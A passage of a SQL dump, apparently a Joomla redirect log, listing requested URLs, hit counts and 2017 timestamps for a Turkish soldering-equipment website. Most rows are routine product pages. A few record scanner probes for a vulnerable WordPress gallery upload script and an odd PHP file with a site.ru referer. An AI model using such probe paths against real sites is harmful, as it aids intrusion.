00:00:00',301),(11598,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,product_sku/results,1-50',NULL,'','',1,0,'2017-11-13 19:43:12','0000-00-00 00:00:00',301),(11599,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/dirdesc',NULL,'','',2,0,'2017-11-13 19:47:20','0000-00-00 00:00:00',301),(11600,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/results,1-20',NULL,'','',1,0,'2017-11-13 19:55:01','0000-00-00 00:00:00',301),(11601,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-13 19:56:19','0000-00-00 00:00:00',301),(11602,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,ordering',NULL,'','',1,0,'2017-11-13 20:06:49','0000-00-00 00:00:00',301),(11603,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_pb3_s_250x250.jpg',NULL,'','',1,0,'2017-11-13 20:28:25','0000-00-00 00:00:00',301),(11604,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rhii_640x420_250x250.jpg',NULL,'','',1,0,'2017-11-13 20:28:53','0000-00-00 00:00:00',301),(11605,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,ordering/results,1-10',NULL,'','',5,0,'2017-11-13 20:36:19','0000-00-00 00:00:00',301),(11606,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku/results,1-5',NULL,'','',4,0,'2017-11-13 20:54:01','0000-00-00 00:00:00',301),(11607,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/npm_250x250.jpg',NULL,'','',1,0,'2017-11-13 20:54:28','0000-00-00 00:00:00',301),(11608,'http://www.3s-technologies.com.tr/tr/urunler/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',29,0,'2017-11-13 21:05:49','0000-00-00 00:00:00',301),(11609,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/spartan-8s-8d-44-detail',NULL,'','',5,0,'2017-11-13 21:28:26','0000-00-00 00:00:00',301),(11610,'http://www.3s-technologies.com.tr/tr/urunler/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-13 21:29:26','0000-00-00 00:00:00',301),(11611,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jvk_250x250.jpg',NULL,'','',1,0,'2017-11-13 21:34:33','0000-00-00 00:00:00',301),(11612,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_sku/results,1-5',NULL,'','',7,0,'2017-11-13 21:35:20','0000-00-00 00:00:00',301),(11613,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,mf_name',NULL,'','',238,0,'2017-11-13 21:41:14','0000-00-00 00:00:00',301),(11614,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering/results,1-40',NULL,'','',3,0,'2017-11-13 21:53:02','0000-00-00 00:00:00',301),(11615,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar',NULL,'','',14,0,'2017-11-13 22:03:14','0000-00-00 00:00:00',301),(11616,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',352,0,'2017-11-13 22:08:36','0000-00-00 00:00:00',301),(11617,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',355,0,'2017-11-13 22:08:39','0000-00-00 00:00:00',301),(11618,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',364,0,'2017-11-13 22:08:45','0000-00-00 00:00:00',301),(11619,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',359,0,'2017-11-13 22:09:19','0000-00-00 00:00:00',301),(11620,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',345,0,'2017-11-13 22:09:23','0000-00-00 00:00:00',301),(11621,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',359,0,'2017-11-13 22:09:40','0000-00-00 00:00:00',301),(11622,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',355,0,'2017-11-13 22:09:56','0000-00-00 00:00:00',301),(11623,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',352,0,'2017-11-13 22:10:13','0000-00-00 00:00:00',301),(11624,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',344,0,'2017-11-13 22:10:25','0000-00-00 00:00:00',301),(11625,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',334,0,'2017-11-13 22:10:32','0000-00-00 00:00:00',301),(11626,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',340,0,'2017-11-13 22:10:57','0000-00-00 00:00:00',301),(11627,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',329,0,'2017-11-13 22:11:25','0000-00-00 00:00:00',301),(11628,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',178,0,'2017-11-13 22:11:35','0000-00-00 00:00:00',301),(11629,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',343,0,'2017-11-13 22:11:49','0000-00-00 00:00:00',301),(11630,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name?language=tr-tr',NULL,'','',2,0,'2017-11-13 22:12:00','0000-00-00 00:00:00',301),(11631,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',350,0,'2017-11-13 22:12:04','0000-00-00 00:00:00',301),(11632,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',6,0,'2017-11-13 22:29:36','0000-00-00 00:00:00',301),(11633,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-10',NULL,'','',3,0,'2017-11-13 22:34:21','0000-00-00 00:00:00',301),(11634,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,ordering',NULL,'','',364,0,'2017-11-13 22:38:23','0000-00-00 00:00:00',301),(11635,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,pc.ordering,product_name',NULL,'','',351,0,'2017-11-13 22:38:28','0000-00-00 00:00:00',301),(11636,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',352,0,'2017-11-13 22:38:30','0000-00-00 00:00:00',301),(11637,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',365,0,'2017-11-13 22:38:33','0000-00-00 00:00:00',301),(11638,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',370,0,'2017-11-13 22:38:43','0000-00-00 00:00:00',301),(11639,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',359,0,'2017-11-13 22:38:46','0000-00-00 00:00:00',301),(11640,'http://3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',366,0,'2017-11-13 22:38:49','0000-00-00 00:00:00',301),(11641,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',13,0,'2017-11-13 22:40:15','0000-00-00 00:00:00',301),(11642,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',678,0,'2017-11-13 22:40:34','0000-00-00 00:00:00',301),(11643,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',717,0,'2017-11-13 22:40:49','0000-00-00 00:00:00',301),(11644,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',685,0,'2017-11-13 22:41:02','0000-00-00 00:00:00',301),(11645,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-13 22:41:09','0000-00-00 00:00:00',301),(11646,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/mirae_logo_250x250.gif',NULL,'','',4,0,'2017-11-13 22:50:42','0000-00-00 00:00:00',301),(11647,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/results,1-5',NULL,'','',2,0,'2017-11-13 23:03:51','0000-00-00 00:00:00',301),(11648,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,mf_name',NULL,'','',13,0,'2017-11-13 23:20:17','0000-00-00 00:00:00',301),(11649,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-13 23:27:28','0000-00-00 00:00:00',301),(11650,'http://www.3s-technologies.com.tr/index.php/en/products/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-11-13 23:27:33','0000-00-00 00:00:00',301),(11651,'http://www.3s-technologies.com.tr/en/products/bolgesel-lehimleme',NULL,'http://www.3s-technologies.com.tr/','',7,0,'2017-11-13 23:38:19','0000-00-00 00:00:00',301),(11652,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/results,1-5',NULL,'','',3,0,'2017-11-13 23:45:10','0000-00-00 00:00:00',301),(11653,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,product_name',NULL,'','',45,0,'2017-11-13 23:45:22','0000-00-00 00:00:00',301),(11654,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-13 23:50:29','0000-00-00 00:00:00',301),(11655,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',633,0,'2017-11-13 23:51:04','0000-00-00 00:00:00',301),(11656,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer',NULL,'','',17,0,'2017-11-14 00:02:52','0000-00-00 00:00:00',301),(11657,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/mi-300-detail',NULL,'','',1,0,'2017-11-14 00:08:46','0000-00-00 00:00:00',301),(11658,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/joomla/index.php/fr/accueil/92-french/french-contect/news/flas-haber-2?format=feed&type=rss',NULL,'','',3,0,'2017-11-14 00:17:49','0000-00-00 00:00:00',301),(11659,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku/results,1-50',NULL,'','',10,0,'2017-11-14 00:20:35','0000-00-00 00:00:00',301),(11660,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-14 00:20:37','0000-00-00 00:00:00',301),(11661,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/ddm-novastar',NULL,'','',16,0,'2017-11-14 00:26:29','0000-00-00 00:00:00',301),(11662,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc/results,1-10',NULL,'','',2,0,'2017-11-14 01:01:53','0000-00-00 00:00:00',301),(11663,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku',NULL,'','',2,0,'2017-11-14 01:05:52','0000-00-00 00:00:00',301),(11664,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc',NULL,'','',2,0,'2017-11-14 01:19:35','0000-00-00 00:00:00',301),(11665,'http://www.3s-technologies.com.tr/en/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',3,0,'2017-11-14 01:22:16','0000-00-00 00:00:00',301),(11666,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/ddm-novastar',NULL,'','',15,0,'2017-11-14 01:31:24','0000-00-00 00:00:00',301),(11667,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,ordering?error=404&language=en-gb',NULL,'','',1,0,'2017-11-14 01:39:50','0000-00-00 00:00:00',301),(11668,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc/results,1-40',NULL,'','',5,0,'2017-11-14 01:55:00','0000-00-00 00:00:00',301),(11669,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-10',NULL,'','',1,0,'2017-11-14 02:00:54','0000-00-00 00:00:00',301),(11670,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/k_sb_2_250x250.png',NULL,'','',6,0,'2017-11-14 02:11:00','0000-00-00 00:00:00',301),(11671,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/results,1-50',NULL,'','',4,0,'2017-11-14 02:12:42','0000-00-00 00:00:00',301),(11672,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri',NULL,'','',42,0,'2017-11-14 02:18:36','0000-00-00 00:00:00',301),(11673,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_fl_250x250.png',NULL,'','',1,0,'2017-11-14 02:21:31','0000-00-00 00:00:00',301),(11674,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name',NULL,'','',4,0,'2017-11-14 02:30:24','0000-00-00 00:00:00',301),(11675,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-14 02:38:26','0000-00-00 00:00:00',301),(11676,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,category_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-14 02:40:51','0000-00-00 00:00:00',301),(11677,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/lfs-1-photo_250x250.gif',NULL,'','',5,0,'2017-11-14 02:46:00','0000-00-00 00:00:00',301),(11678,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/kopyası-gf-12ht_250x250.gif',NULL,'','',1,0,'2017-11-14 02:52:18','0000-00-00 00:00:00',301),(11679,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,category_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-14 02:56:23','0000-00-00 00:00:00',301),(11680,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/spr-20-41-detail',NULL,'','',8,0,'2017-11-14 02:59:54','0000-00-00 00:00:00',301),(11681,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/cs40-detail',NULL,'','',2,0,'2017-11-14 03:05:49','0000-00-00 00:00:00',301),(11682,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/results,1-10',NULL,'','',4,0,'2017-11-14 03:23:31','0000-00-00 00:00:00',301),(11683,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/2.-el-makineler/rh6-detail',NULL,'','',3,0,'2017-11-14 03:29:25','0000-00-00 00:00:00',301),(11684,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/lfs-1-detail',NULL,'','',4,0,'2017-11-14 03:35:19','0000-00-00 00:00:00',301),(11685,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/jv131-detail',NULL,'','',5,0,'2017-11-14 03:47:07','0000-00-00 00:00:00',301),(11686,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/2.-el-makineler/rh2-detail',NULL,'','',6,0,'2017-11-14 04:04:20','0000-00-00 00:00:00',301),(11687,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/mi-300-detail',NULL,'','',1,0,'2017-11-14 04:10:14','0000-00-00 00:00:00',301),(11688,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',3,0,'2017-11-14 04:13:11','0000-00-00 00:00:00',301),(11689,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/spr-20-41-detail',NULL,'','',9,0,'2017-11-14 04:18:50','0000-00-00 00:00:00',301),(11690,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-11-14 04:34:01','0000-00-00 00:00:00',301),(11691,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_name',NULL,'','',40,0,'2017-11-14 04:46:45','0000-00-00 00:00:00',301),(11692,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-14 04:47:45','0000-00-00 00:00:00',301),(11693,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',2,0,'2017-11-14 04:54:18','0000-00-00 00:00:00',301),(11694,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic',NULL,'','',49,0,'2017-11-14 05:00:08','0000-00-00 00:00:00',301),(11695,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri',NULL,'','',43,0,'2017-11-14 05:10:05','0000-00-00 00:00:00',301),(11696,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_sku?language=tr-tr',NULL,'','',31,0,'2017-11-14 05:32:17','0000-00-00 00:00:00',301),(11697,'http://www.3s-technologies.com.tr/index.php/en/products/spr-20-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-14 05:38:31','0000-00-00 00:00:00',301),(11698,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-14 05:46:30','0000-00-00 00:00:00',301),(11699,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/spr-20-41-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-14 05:53:15','0000-00-00 00:00:00',301),(11700,'http://www.3s-technologies.com.tr/index.php/tr/anasayfa2/78-turkish-tr',NULL,'','',38,0,'2017-11-14 05:58:12','0000-00-00 00:00:00',301),(11701,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lfs-1-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-14 05:58:23','0000-00-00 00:00:00',301),(11702,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın',NULL,'','',415,0,'2017-11-14 06:01:11','0000-00-00 00:00:00',301),(11703,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/npm-detail',NULL,'','',225,0,'2017-11-14 06:03:26','0000-00-00 00:00:00',301),(11704,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,product_name?language=tr-tr',NULL,'','',24,0,'2017-11-14 06:16:28','0000-00-00 00:00:00',301),(11705,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/mi-300-detail?tmpl=component&print=1',NULL,'','',4,0,'2017-11-14 06:21:13','0000-00-00 00:00:00',301),(11706,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',5,0,'2017-11-14 06:29:15','0000-00-00 00:00:00',301),(11707,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',217,0,'2017-11-14 06:31:52','0000-00-00 00:00:00',301),(11708,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_sku',NULL,'','',237,0,'2017-11-14 06:34:23','0000-00-00 00:00:00',301),(11709,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh6-detail',NULL,'','',53,0,'2017-11-14 06:53:06','0000-00-00 00:00:00',301),(11710,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-14 06:53:51','0000-00-00 00:00:00',301),(11711,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/rh2-20-detail',NULL,'','',38,0,'2017-11-14 06:57:49','0000-00-00 00:00:00',301),(11712,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/hakkimizda',NULL,'','',11,0,'2017-11-14 07:00:07','0000-00-00 00:00:00',301),(11713,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-14 07:06:11','0000-00-00 00:00:00',301),(11714,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/rh2-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-14 07:15:32','0000-00-00 00:00:00',301),(11715,'http://www.3s-technologies.com.tr/en/products/am100-detail?tmpl=component&print=1',NULL,'','',43,0,'2017-11-14 07:21:14','0000-00-00 00:00:00',301),(11716,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',2,0,'2017-11-14 07:25:49','0000-00-00 00:00:00',301),(11717,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/a_stencilwasher-eco_s_250x250.jpg',NULL,'','',2,0,'2017-11-14 07:26:54','0000-00-00 00:00:00',301),(11718,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-45va_250x250.gif',NULL,'','',3,0,'2017-11-14 07:32:25','0000-00-00 00:00:00',301),(11719,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,category_name',NULL,'','',236,0,'2017-11-14 07:37:32','0000-00-00 00:00:00',301),(11720,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ls60v_250x250.gif',NULL,'','',1,0,'2017-11-14 07:38:12','0000-00-00 00:00:00',301),(11721,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/lfs-1-photo_250x250.gif',NULL,'','',5,0,'2017-11-14 07:40:51','0000-00-00 00:00:00',301),(11722,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/rhii_640x420_250x250.jpg',NULL,'','',8,0,'2017-11-14 07:41:18','0000-00-00 00:00:00',301),(11723,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',1,0,'2017-11-14 07:41:55','0000-00-00 00:00:00',301),(11724,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rhii_640x420_250x250.jpg',NULL,'','',3,0,'2017-11-14 07:46:47','0000-00-00 00:00:00',301),(11725,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-20',NULL,'','',5,0,'2017-11-14 08:01:49','0000-00-00 00:00:00',301),(11726,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim',NULL,'','',8,0,'2017-11-14 08:06:57','0000-00-00 00:00:00',301),(11727,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/hakkimizda',NULL,'','',15,0,'2017-11-14 08:17:14','0000-00-00 00:00:00',301),(11728,'http://www.3s-technologies.com.tr/tr/uploads/logos/56588eed46f39_resizedown302px133px16.jpg',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_installer','',1,0,'2017-11-14 08:32:14','0000-00-00 00:00:00',301),(11729,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_kr907_s_250x250.png',NULL,'','',2,0,'2017-11-14 08:36:02','0000-00-00 00:00:00',301),(11730,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-14 08:37:48','0000-00-00 00:00:00',301),(11731,'http://3s-technologies.com.tr/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',235,0,'2017-11-14 09:05:19','0000-00-00 00:00:00',301),(11732,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/avk3_1m_250x250.jpg',NULL,'','',1,0,'2017-11-14 09:14:12','0000-00-00 00:00:00',301),(11733,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/tolo_logo_250x250.jpg',NULL,'','',12,0,'2017-11-14 09:15:33','0000-00-00 00:00:00',301),(11734,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyası-gf-12ht_250x250.gif',NULL,'','',4,0,'2017-11-14 09:21:05','0000-00-00 00:00:00',301),(11735,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering?language=en-gb',NULL,'','',2,0,'2017-11-14 09:33:07','0000-00-00 00:00:00',301),(11736,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc',NULL,'','',5,0,'2017-11-14 09:39:31','0000-00-00 00:00:00',301),(11737,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/results,1-50',NULL,'','',7,0,'2017-11-14 10:05:14','0000-00-00 00:00:00',301),(11738,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,ordering',NULL,'','',207,0,'2017-11-14 10:10:22','0000-00-00 00:00:00',301),(11739,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim',NULL,'','',50,0,'2017-11-14 10:21:06','0000-00-00 00:00:00',301),(11740,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-14 10:26:00','0000-00-00 00:00:00',301),(11741,'http://www.3s-technologies.com.tr/tr/urunler/trident-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-14 10:36:05','0000-00-00 00:00:00',301),(11742,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-14 10:50:26','0000-00-00 00:00:00',301),(11743,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-14 11:02:33','0000-00-00 00:00:00',301),(11744,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name',NULL,'','',49,0,'2017-11-14 11:06:57','0000-00-00 00:00:00',301),(11745,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-14 11:09:53','0000-00-00 00:00:00',301),(11746,'http://www.3s-technologies.com.tr/tr/ueruenler/lehimleme-malzemeleri',NULL,'','',3,0,'2017-11-14 11:17:14','0000-00-00 00:00:00',301),(11747,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cs-40_250x250.gif',NULL,'','',6,0,'2017-11-14 11:18:23','0000-00-00 00:00:00',301),(11748,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_ly8c_250x250.jpg',NULL,'','',4,0,'2017-11-14 11:18:58','0000-00-00 00:00:00',301),(11749,'http://www.3s-technologies.com.tr/tr/joomla/index.php?option=com_content&view=article&id=93&itemid=104',NULL,'','',1,0,'2017-11-14 11:53:14','0000-00-00 00:00:00',301),(11750,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-14 11:53:45','0000-00-00 00:00:00',301),(11751,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/results,1-20',NULL,'','',3,0,'2017-11-14 12:13:48','0000-00-00 00:00:00',301),(11752,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/spr-20-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-14 12:15:49','0000-00-00 00:00:00',301),(11753,'http://3s-technologies.com.tr/tr/modules/mod_articles_category/media-views-rtl.php',NULL,'http://site.ru','',2,0,'2017-11-14 12:58:55','0000-00-00 00:00:00',301),(11754,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name?language=tr-tr',NULL,'','',23,0,'2017-11-14 13:01:20','0000-00-00 